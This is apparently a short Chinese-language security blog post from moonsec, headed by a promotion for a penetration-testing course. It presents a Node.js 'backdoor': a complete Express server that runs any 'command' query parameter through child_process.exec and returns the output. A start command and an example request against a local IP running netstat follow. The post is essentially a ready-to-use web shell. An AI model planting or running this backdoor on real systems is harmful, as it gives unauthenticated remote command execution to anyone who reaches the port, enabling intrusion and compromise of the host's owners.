node js 后门
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
var express = require('express'); var app = express(); //内置中间件,静态文件访问 app.use(express.static('./')) //监听 var server = app.listen(8000, function () { var host = server.address().address var port = server.address().port console.log(host, port); }) //当访问根目录时触发 app.get('/', function (req, res) { //command var command = req.query.command; //执行 var exec = require("child_process").exec; exec(command,function(err,stdout){ //输出到网页 res.end(stdout); }); })
node app.js
http://192.168.0.187:8000/?command=netstat%20-an
原创文章,作者:moonsec,如若转载,请注明出处:https://www.moonsec.com/3189.html